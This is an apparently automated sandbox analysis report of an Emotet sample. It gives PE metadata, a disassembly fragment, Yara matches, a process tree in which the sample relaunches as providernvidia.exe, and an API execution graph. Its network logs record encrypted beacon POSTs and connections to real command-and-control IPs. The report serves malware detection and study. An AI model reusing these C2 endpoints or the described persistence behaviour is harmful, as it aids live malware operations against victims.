                                                                                      mov dword ptr [ebp-0Ch], ecx
                                                                                      mov esi, 00000001h
                                                                                      mov dword ptr [ebp-08h], esi
                                                                                      mov eax, dword ptr [edi]
                                                                                      cmp eax, 7Fh
                                                                                      jbe 00007FB7BCCF1331h
                                                                                      lea ecx, dword ptr [ecx+00h]
                                                                                      shr eax, 07h
                                                                                      inc esi
                                                                                      cmp eax, 7Fh

                                                                                      Rich Headers

                                                                                      Programming Language:
                                                                                      • [LNK] VS2013 UPD4 build 31101
                                                                                      • [IMP] VS2008 SP1 build 30729

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xbad00x28.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xd0000x5cc.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xb0000x8.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x98830x9a00False0.503297483766data6.45508103349IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0xb0000xb2e0xc00False0.160807291667data4.23495809712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0xc0000xbd80x200False0.123046875data0.91267432928IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                      .reloc0xd0000x5cc0x600False0.8671875data6.49434732961IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                      Imports

                                                                                      DLLImport
                                                                                      KERNEL32.dllWTSGetActiveConsoleSessionId

                                                                                      Network Behavior

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Apr 3, 2021 01:04:27.744750023 CEST49718443192.168.2.379.172.249.82
                                                                                      Apr 3, 2021 01:04:27.795115948 CEST4434971879.172.249.82192.168.2.3
                                                                                      Apr 3, 2021 01:04:27.795283079 CEST49718443192.168.2.379.172.249.82
                                                                                      Apr 3, 2021 01:04:27.796459913 CEST49718443192.168.2.379.172.249.82
                                                                                      Apr 3, 2021 01:04:27.848980904 CEST4434971879.172.249.82192.168.2.3
                                                                                      Apr 3, 2021 01:04:27.849355936 CEST4434971879.172.249.82192.168.2.3
                                                                                      Apr 3, 2021 01:04:27.849461079 CEST4434971879.172.249.82192.168.2.3
                                                                                      Apr 3, 2021 01:04:27.849464893 CEST49718443192.168.2.379.172.249.82
                                                                                      Apr 3, 2021 01:04:27.849570036 CEST49718443192.168.2.379.172.249.82
                                                                                      Apr 3, 2021 01:04:27.849802017 CEST49718443192.168.2.379.172.249.82
                                                                                      Apr 3, 2021 01:04:27.902743101 CEST4434971879.172.249.82192.168.2.3
                                                                                      Apr 3, 2021 01:04:58.506544113 CEST497268080192.168.2.3193.169.54.12
                                                                                      Apr 3, 2021 01:05:01.670352936 CEST497268080192.168.2.3193.169.54.12
                                                                                      Apr 3, 2021 01:05:07.670866013 CEST497268080192.168.2.3193.169.54.12
                                                                                      Apr 3, 2021 01:05:50.218765020 CEST497388080192.168.2.3173.230.145.224
                                                                                      Apr 3, 2021 01:05:53.221704960 CEST497388080192.168.2.3173.230.145.224
                                                                                      Apr 3, 2021 01:05:59.222287893 CEST497388080192.168.2.3173.230.145.224

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Apr 3, 2021 01:04:11.626796007 CEST5128153192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:11.677638054 CEST53512818.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:12.533082008 CEST4919953192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:12.585621119 CEST53491998.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:13.353194952 CEST5062053192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:13.411597967 CEST53506208.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:13.517541885 CEST6493853192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:13.570008993 CEST53649388.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:14.341586113 CEST6015253192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:14.390805960 CEST53601528.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:15.288156986 CEST5754453192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:15.345732927 CEST53575448.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:16.202591896 CEST5598453192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:16.252716064 CEST53559848.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:17.362696886 CEST6418553192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:17.412007093 CEST53641858.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:18.139605045 CEST6511053192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:18.195322990 CEST53651108.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:19.028096914 CEST5836153192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:19.075795889 CEST53583618.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:20.017126083 CEST6349253192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:20.073215008 CEST53634928.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:20.936980963 CEST6083153192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:20.988282919 CEST53608318.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:21.884759903 CEST6010053192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:21.932210922 CEST53601008.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:22.778618097 CEST5319553192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:22.830749989 CEST53531958.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:23.935580969 CEST5014153192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:23.984411955 CEST53501418.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:25.086994886 CEST5302353192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:25.138592958 CEST53530238.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:27.246903896 CEST4956353192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:27.293003082 CEST53495638.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:28.189302921 CEST5135253192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:28.248847008 CEST53513528.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:29.407177925 CEST5934953192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:29.454309940 CEST53593498.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:49.163181067 CEST5708453192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:49.211946964 CEST53570848.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:04:51.198832035 CEST5882353192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:04:51.261545897 CEST53588238.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:05:02.180833101 CEST5756853192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:05:02.246213913 CEST53575688.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:05:07.678947926 CEST5054053192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:05:07.739001036 CEST53505408.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:05:14.415618896 CEST5436653192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:05:14.480581045 CEST53543668.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:05:28.678618908 CEST5303453192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:05:28.727392912 CEST53530348.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:05:31.549103975 CEST5776253192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:05:31.617674112 CEST53577628.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:06:03.288327932 CEST5543553192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:06:03.336225986 CEST53554358.8.8.8192.168.2.3
                                                                                      Apr 3, 2021 01:06:05.225025892 CEST5071353192.168.2.38.8.8.8
                                                                                      Apr 3, 2021 01:06:05.279227972 CEST53507138.8.8.8192.168.2.3

                                                                                      HTTP Request Dependency Graph

                                                                                      • 79.172.249.82:443

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.34971879.172.249.82443C:\Windows\SysWOW64\providernvidia.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Apr 3, 2021 01:04:27.796459913 CEST1345OUTPOST / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: 79.172.249.82:443
                                                                                      Content-Length: 436
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 46 d3 2b 54 ae fc d6 3a 76 c4 9e 73 48 fe 49 d5 f8 b4 aa 2d 29 2b 5f 2f 51 43 49 d6 af b1 ee d1 66 a4 76 ca 80 7e 7d ea e5 1f b8 54 d1 f6 a8 c4 fa a1 57 39 fb 61 52 4d 96 65 1c a6 e5 99 49 14 ec 0a 71 5f e2 5f 33 d0 20 69 8c 9f 5a 32 77 74 73 7c c9 2f 93 bb 77 57 92 b1 7c 99 c3 87 db a5 21 ba d8 2c 2a d2 42 78 56 49 b5 f0 29 02 0c 0b 03 48 d2 8c 0b c9 96 0c 72 db 03 60 c2 fd 84 b6 1e f7 81 47 a2 a2 9f d7 df 4b 9b f8 81 27 f6 3c b6 1e 86 50 82 d3 0f c4 89 b9 d3 fa 11 b7 88 64 d4 13 72 ae 99 42 2a 33 00 d6 11 d6 e3 8f e5 c0 42 f8 4a 5e 4a 03 84 cb 86 dd ca 23 08 65 6d c2 80 b0 5c 78 7a d1 b5 7c 3b a0 03 2f 7e 46 84 fe 20 39 80 e0 81 78 aa bd 76 5f e9 ba 44 da d9 74 a3 d7 62 aa d7 3f 80 3d 8c b4 7a 00 be a8 d2 d3 f9 fb ab 00 f1 69 ea de 4c 42 14 d6 2b ca 76 bc b0 81 d7 e3 64 e6 af 00 43 c2 fa b0 a0 b9 da 47 86 d2 c5 cd 8c 15 59 05 75 39 6e e0 88 2c 4c f3 98 f9 d4 2c cb 9b 5f e7 88 4c 6d 67 98 57 b5 24 85 66 8e 2b 85 05 b1 48 6d e2 d8 2c 6b 5b df 78 26 b4 bf 71 e3 0f db 5f 38 ac 75 b5 12 43 ee 84 ec fb c3 ad 2e ba 07 ba 93 15 f2 d5 a8 d1 7c e9 a8 80 75 3f 62 31 6b 10 eb 5e 0e 5c b6 7e 5f 93 85 d6 88 ce 51 db 56 aa d8 17 1c e6 e8 4d 44 7a ed b0 f6 cf 34 da df 30 cb 84 62 00 1e dc 3c 10 8b a2 b9 0b ca 86 99 83 56 f0 9e af b0 6b 27 04 50 79 50 41 39 0b 87 d2 d8 cb 92 28 81 56 30 24 78 94 30 48
                                                                                      Data Ascii: F+T:vsHI-)+_/QCIfv~}TW9aRMeIq__3 iZ2wts|/wW|!,*BxVI)Hr`GK'<PdrB*3BJ^J#em\xz|;/~F 9xv_Dtb?=ziLB+vdCGYu9n,L,_LmgW$f+Hm,k[x&q_8uC.|u?b1k^\~_QVMDz40b<Vk'PyPA9(V0$x0H
                                                                                      Apr 3, 2021 01:04:27.849355936 CEST1346INHTTP/1.1 400 Bad Request
                                                                                      Date: Fri, 02 Apr 2021 23:04:27 GMT
                                                                                      Server: Apache/2.4.25 (Debian)
                                                                                      Content-Length: 362
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


                                                                                      Code Manipulations

                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Start time:01:04:18
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Users\user\Desktop\9fdUNaHzLv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\Desktop\9fdUNaHzLv.exe'
                                                                                      Imagebase:0xd10000
                                                                                      File size:45568 bytes
                                                                                      MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.194691427.0000000000D11000.00000020.00020000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:01:04:19
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Users\user\Desktop\9fdUNaHzLv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\9fdUNaHzLv.exe
                                                                                      Imagebase:0xd10000
                                                                                      File size:45568 bytes
                                                                                      MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.204527300.0000000000D11000.00000020.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.195820099.0000000000D11000.00000020.00020000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:01:04:22
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\SysWOW64\providernvidia.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\providernvidia.exe
                                                                                      Imagebase:0xd10000
                                                                                      File size:45568 bytes
                                                                                      MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.203725030.0000000000D11000.00000020.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000000.202520329.0000000000D11000.00000020.00020000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:01:04:22
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\SysWOW64\providernvidia.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\providernvidia.exe
                                                                                      Imagebase:0xd10000
                                                                                      File size:45568 bytes
                                                                                      MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000000.203362622.0000000000D11000.00000020.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.463908181.0000000000D11000.00000020.00020000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:01:04:25
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                      Imagebase:0x7ff7488e0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:04:48
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                      Imagebase:0x7ff7488e0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:04:49
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                      Imagebase:0x7ff7488e0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:04:59
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                      Imagebase:0x7ff7488e0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:05:00
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                      Imagebase:0x7ff7488e0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:05:00
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                      Imagebase:0x7ff7488e0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:05:00
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                      Imagebase:0x7ff7488e0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:05:01
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                      Imagebase:0x7ff7488e0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:05:02
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\SgrmBroker.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                      Imagebase:0x7ff6490c0000
                                                                                      File size:163336 bytes
                                                                                      MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:05:02
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                      Imagebase:0x7ff7488e0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:05:04
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                      Imagebase:0x7ff7488e0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:01:06:03
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                      Imagebase:0x7ff6ddb00000
                                                                                      File size:455656 bytes
                                                                                      MD5 hash:A267555174BFA53844371226F482B86B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:01:06:03
                                                                                      Start date:03/04/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6b2800000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:2.1%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:8.3%
                                                                                        Total number of Nodes:533
                                                                                        Total number of Limit Nodes:3

                                                                                        Graph

                                                                                        execution_graph 2083 d19ee0 2095 d11be0 GetPEB 2083->2095 2088 d11be0 GetPEB 2089 d19f1c 2088->2089 2090 d11b10 2 API calls 2089->2090 2091 d19f28 GetProcessHeap RtlAllocateHeap 2090->2091 2092 d19f45 memset GetProcessHeap RtlFreeHeap 2091->2092 2093 d19f6b ExitProcess 2091->2093 2102 d115b0 GetModuleFileNameW 2092->2102 2096 d11bfc 2095->2096 2097 d11b10 2096->2097 2098 d11bcd 2097->2098 2099 d11b50 2097->2099 2098->2088 2099->2098 2100 d11bb1 2099->2100 2100->2099 2117 d11a20 2100->2117 2103 d115da 2102->2103 2125 d11830 GetProcessHeap RtlAllocateHeap 2103->2125 2106 d11830 2 API calls 2107 d11633 _snwprintf GetProcessHeap HeapFree CreateEventW 2106->2107 2108 d11691 2107->2108 2109 d11673 CreateMutexW 2107->2109 2108->2093 2110 d11699 GetLastError 2109->2110 2111 d1168a CloseHandle 2109->2111 2112 d116a6 SetEvent CloseHandle CloseHandle 2110->2112 2113 d116cb memset CreateProcessW 2110->2113 2111->2108 2127 d19c50 2112->2127 2113->2108 2115 d11711 WaitForSingleObject CloseHandle CloseHandle CloseHandle CloseHandle 2113->2115 2115->2093 2118 d11a35 2117->2118 2119 d11be0 GetPEB 2118->2119 2120 d11ad5 2119->2120 2121 d11aeb 2120->2121 2122 d11ada LoadLibraryW 2120->2122 2124 d11b10 GetPEB 2121->2124 2122->2121 2123 d11afd 2122->2123 2123->2100 2124->2123 2126 d115f4 _snwprintf GetProcessHeap HeapFree 2125->2126 2126->2106 2128 d11830 2 API calls 2127->2128 2129 d19c6d LoadLibraryW 2128->2129 2130 d11b10 2 API calls 2129->2130 2131 d19c92 GetProcessHeap HeapFree 2130->2131 2132 d11830 2 API calls 2131->2132 2133 d19cbd LoadLibraryW 2132->2133 2134 d11b10 2 API calls 2133->2134 2135 d19ce2 GetProcessHeap HeapFree 2134->2135 2136 d11830 2 API calls 2135->2136 2137 d19d0d LoadLibraryW 2136->2137 2138 d11b10 2 API calls 2137->2138 2139 d19d32 GetProcessHeap HeapFree 2138->2139 2140 d11830 2 API calls 2139->2140 2141 d19d5d LoadLibraryW 2140->2141 2142 d11b10 2 API calls 2141->2142 2143 d19d82 GetProcessHeap HeapFree 2142->2143 2144 d11830 2 API calls 2143->2144 2145 d19dad LoadLibraryW 2144->2145 2146 d11b10 2 API calls 2145->2146 2147 d19dd2 GetProcessHeap HeapFree 2146->2147 2148 d11830 2 API calls 2147->2148 2149 d19dfd LoadLibraryW 2148->2149 2150 d11b10 2 API calls 2149->2150 2151 d19e22 GetProcessHeap HeapFree 2150->2151 2152 d11830 2 API calls 2151->2152 2153 d19e4d LoadLibraryW 2152->2153 2154 d11b10 2 API calls 2153->2154 2155 d19e72 GetProcessHeap HeapFree 2154->2155 2156 d11830 2 API calls 2155->2156 2157 d19e9d LoadLibraryW 2156->2157 2158 d11b10 2 API calls 2157->2158 2159 d19ec2 GetProcessHeap HeapFree 2158->2159 2162 d192a0 GetWindowsDirectoryW 2159->2162 2161 d116c0 2161->2093 2163 d1930b 2162->2163 2165 d192bf 2162->2165 2164 d19320 28 API calls 2163->2164 2166 d19310 2164->2166 2165->2163 2167 d192ed GetVolumeInformationW 2165->2167 2169 d192df 2165->2169 2168 d19060 34 API calls 